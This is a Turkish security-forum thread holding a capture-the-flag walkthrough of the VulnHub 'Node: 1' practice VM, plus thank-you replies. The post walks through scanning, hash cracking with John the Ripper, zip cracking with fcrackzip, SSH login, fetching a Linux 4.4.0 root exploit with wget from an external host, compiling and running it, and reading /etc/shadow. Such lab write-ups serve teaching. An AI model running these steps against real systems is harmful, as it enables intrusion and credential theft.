Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm



Node 1 Açıklı Makine Çözümü / ch_arli41

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 02-09-2018 23:56   #1
  • Eğitmen
  • Üye Bilgileri
Üyelik tarihi
07/2009
Mesajlar
Konular

Teşekkür (Etti): 530
Teşekkür (Aldı): 386


Node 1 Açıklı Makine Çözümü / ch_arli41



Merhaba arkadaşlar.
Bu konumda sizlere Node:1 orta seviye açıklı makine’nin çözümünü anlatacam.Başlamadan kısa bilgi vereyim.Açık bulunan sistem user ve root flags(bayraklarını) bulmamızı istiyorlar.Ben burda sistemin şifrelerini almayı, şifrelerin kırma yöntemlerini ve sistemde root yetkisine ulaşmayı gösterecem.Sizlerden isteğim root flag(bayrağını) bulmanız.Bulduğunuz bayrağı bana iletirseniz konuya ekliyecem.


Node:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:


https://www.vulnhub.com/entry/node-1,252/#


Sistem kurulumunu ve ayarları yapmak için burdaki konuyu inceleye bilirsiniz.


https://www.turkhackteam.org/siber-g...ch_arli41.html








Kod:
netdiscover

Bu komut bize modeme bağlı cihazları listeliyor.Ordan ip’yi kopyalıyoruz.







Kod:
nmap ipadresi

Bu komut ile portlara bakıyoruz.22 ve 3000 portunu gösteriyor bize 3000 portunu ipadres port numarası olarak tarayıcıma yazıyorum.







Evet karşıma web sayfası geldi.LOGIN kısmına tıklıyorum ve karşıma giriş sayfası çıktı.Şimdiki hedefim giriş bilgilerini bulmak.Bunu için Burp Suite programını kullanacam.







Firefox tarayıcımızın ayarlarını yapıyoruz.Advanced kısmına geliyoruz ve Network'a tıklıyoruz.HTTP kısmına 127.0.0.1 port kısmına 8080 yazıyoruz resimdeki gibi.





Tarayıcıda sayfayı yenile yaptığımızda burp suit proğramımıza geldi.Forward kısmına 2 yada 3 sefer tıklıyoruz.Target bölümüne geçiyoruz.







Burdaki linke sağ tıklıyoruz ve Spider this host'a tıklıyoruz.Bu şekilde brup suit proğramı tarama yapıp bütün detayları bize verecektir.








Resimde gördüğünüz gibi /api/users/ yoluna gidiyorum ve java script link yolunu kopyalıyorum.









Giriş bilgilerine ulaştık.Bilgiler şifrelendiği içi kırmamız gerekecek ilk önce şifreleme türünü bulalım.








hash-identifier

Şifreleme türünü öğrenmek için hash-identifier scriptini kullanıyoruz.Sha-256 ile şifrelendiğini öğrendik devam ediyoruz.







Kod:
john --show --format=raw-sha256 /sifreler.txt

Ben burda John the rippe şifre kırma yazılımını kullandım siz isterseniz diğer şifre kırma araçlarını kullana bilirsiniz.Burda sifreler.txt dosyasının içine kırılacak sifreleri yazıyoruz ve john the rippe programı kendi içindeki wordlist'den yararlanarak şifreleri kırıyor.










Admin panelimize giriş yapıyoruz ve backup dosyası denk geliyor anlaşılan bu iş uzuyacak gibi ama bıkmadan yolumuza devam ediyoruz.Backup dosyasını indiriyoruz.Dosyayı incelememizin sonucunda base64 ile encrypt edildiğini öğrendik.Bu dosyayı decrypt etmemiz gerekiyor.






Kod:
cat myplace.backup | base64 -d > ch_arli41
Yukardaki komut ile backup dosyasını decrypt ediyoruz ve karşımıza zip dosyası çıkıyor.Zip dosyasının içindekileri çıkarmak istediğimizde bizden şifre istiyor.







Zip dosyasını kırmak için fcrackzip yazılımını kullanacaz.Konsola fcrackzip yazıp komutların detayına baka bilirsiniz.







Kod:
fcrackzip -u -D -p wordlist.txt ch_arli41


Bu komut ile zip dosyamızın şifresini kırıyoruz.Burda dikkat edilmesi gereken nokta eğer wordlist'in içinde doğru şifre yoksa kırılmaz bunun için başka wordlist denememiz gereke bilir.








Zip dosyasından dosyaları çıkarttık./var/www/myplace dosya yoluna gidiyoruz apps.js dosyasını not defteri yada metin düzenleyiciyle açıyoruz.Ssh giriş bilgilerini aldık sisteme bağlana biliriz.









Kod:
ssh mark@ipadresi
Bu komut ile sisteme bağlandık.Şimdik sistemi inceliyelim biraz.






Resimdeki gibi sistemin bilgilerini aldım.cat /etc/shadow komutunu yazdığımda yetkimin olmadığını gördüm.Sistemde root yetkisine kendimi yükseltmem gerekecek bunun için 4.4.0 linux local root exploiti'ni aratıyorum googleden ve searchsploit kullanarak.





Kod:
cd /tmp
Kod:
wget http://cyseclabs.com/pub/upstream44.c
cd komutu ile dizin değiştiriyorum.wget komutunu kullanarak c dilinde yazılmış exploiti bulunduğum dizine indiriyorum.







gcc dosya-adi.c -o ch_arli41


Bu komut ile c dilinde yazılmış exploiti derliyorum.






Kod:
./ch_arli41

Yukardaki komut ile exploiti çalıştırıyoruz.Siz orda hangi ismi verdiyseniz o isimi yazacaksınız.






Kod:
cd ..
cat /etc/shadow

Resimde gördüğüz gibi cd komutu ile ana dizine geçiş yaptık cat komutunu kullanarak bilgileri ekrana yansıttık.



Benim anlatımım buraya kadar konunun başında dediğim gibi root bilgisini sizlerden bekliyorum.
Bir sonraki konuda görüşmek üzere..



___________________________________________


Konu ch_arli41 tarafından (03-09-2018 00:02 Saat 00:02 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 02-09-2018 23:59   #2
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893




Elinize Sağlık Güzel Konu
 Offline  
 
Alıntı ile Cevapla
Teşekkür

M3m0ry Teşekkür etti.
Alt 03-09-2018 00:02   #3
  • Analiz Ekibi Sorumlusu
  • Üye Bilgileri
Üyelik tarihi
09/2016
Mesajlar
Konular

Teşekkür (Etti): 57
Teşekkür (Aldı): 1106




Eline emeğine sağlık.



___________________________________________

Nûn kadar suskun,
Vâv kadar edebli olabilmeli,
insan...
 Offline  
 
Alıntı ile Cevapla
Alt 03-09-2018 00:05   #4
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
05/2018
Mesajlar
Konular

Teşekkür (Etti): 68
Teşekkür (Aldı): 358




Elinize sağlık
 Offline  
 
Alıntı ile Cevapla
Alt 03-09-2018 00:18   #5
  • Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
06/2015
Mesajlar
Konular

Teşekkür (Etti): 935
Teşekkür (Aldı): 1331




Eline sağlık güzel, beklenen konulardan
 Offline  
 
Alıntı ile Cevapla
Teşekkür

ch_arli41 Teşekkür etti.
Alt 03-09-2018 00:49   #6
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2017
Nereden
Ötüken
Yaş
82
Mesajlar
Konular

Teşekkür (Etti): 950
Teşekkür (Aldı): 901




Ellerine emeğine farene sağlık abi hak etmiştin



___________________________________________

Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
 Offline  
 
Alıntı ile Cevapla
Alt 03-09-2018 00:59   #7
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
09/2017
Yaş
29
Mesajlar
Konular

Teşekkür (Etti): 631
Teşekkür (Aldı): 369




Elinize emeğinize sağlık
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau